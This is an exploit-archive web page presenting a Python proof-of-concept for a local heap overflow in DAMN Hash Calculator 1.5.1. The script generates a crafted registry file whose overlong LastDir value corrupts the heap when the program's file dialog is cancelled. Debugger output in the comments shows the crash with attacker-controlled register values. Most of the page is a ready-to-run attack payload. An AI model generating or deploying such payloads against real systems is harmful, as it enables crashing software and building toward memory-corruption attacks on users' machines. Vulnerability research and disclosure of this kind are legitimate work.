what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DAMN Hash Calculator 1.5.1 Heap Overflow

DAMN Hash Calculator 1.5.1 Heap Overflow
Posted Feb 23, 2012
Authored by Julien Ahrens

DAMN Hash Calculator version 1.5.1 local heap overflow proof of concept exploit.

tags | exploit, overflow, local, proof of concept
SHA-256 | 0a07425a5cb63b5c8cdabd7b39c0cd2a1863c4b2e2e5946de069c4370473370e

DAMN Hash Calculator 1.5.1 Heap Overflow

Change Mirror Download
#!/usr/bin/python
# Exploit Title: DAMN Hash Calculator v1.5.1 Local Heap Overflow PoC
# Version: 1.5.1
# Date: 2012-02-21
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.google.com
# Tested on: Windows XP SP3 Professional German
# Notes: Old but nice software...just to proof it's there :-)
# Howto: Import Reg -> Start App -> Select File -> Cancel without choosing one
#7C9204E6 . 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
#7C9204E9 . 0B47 10 OR EAX,DWORD PTR DS:[EDI+10]
#7C9204EC . A9 00000269 TEST EAX,69020000
#7C9204F1 . 0F85 8BA70300 JNZ ntdll.7C95AC82
#7C9204F7 > 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
#7C9204FA . 8A48 FD MOV CL,BYTE PTR DS:[EAX-3] <-- Crash
#7C9204FD . 83C0 F8 ADD EAX,-8
#7C920500 . F6C1 01 TEST CL,1
#7C920503 . 56 PUSH ESI
#7C920504 . 0F84 92A70300 JE ntdll.7C95AC9C
#7C92050A . F6C1 08 TEST CL,8
#7C92050D . 0F85 B3A70300 JNZ ntdll.7C95ACC6
#EAX 42424245
#ECX 00000008
#EDX 77C31AE8 msvcrt.77C31AE8
#EBX 0040F2F0 DAMN_Has.0040F2F0
#ESP 0012F54C
#EBP 0012F550
#ESI 0041A2DC ASCII "EBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
#EDI 00330000
#EIP 7C9204FA ntdll.7C9204FA
file="poc.reg"
junk1="\x41" * 392
boom="\x45\x42\x42\x42"
junk2="\x43" * 50
poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\DAMN\Hash Calculator\Settings]\n"
poc=poc + "\"LastDir\"=\"" + junk1 + boom + junk2 + "\""
try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close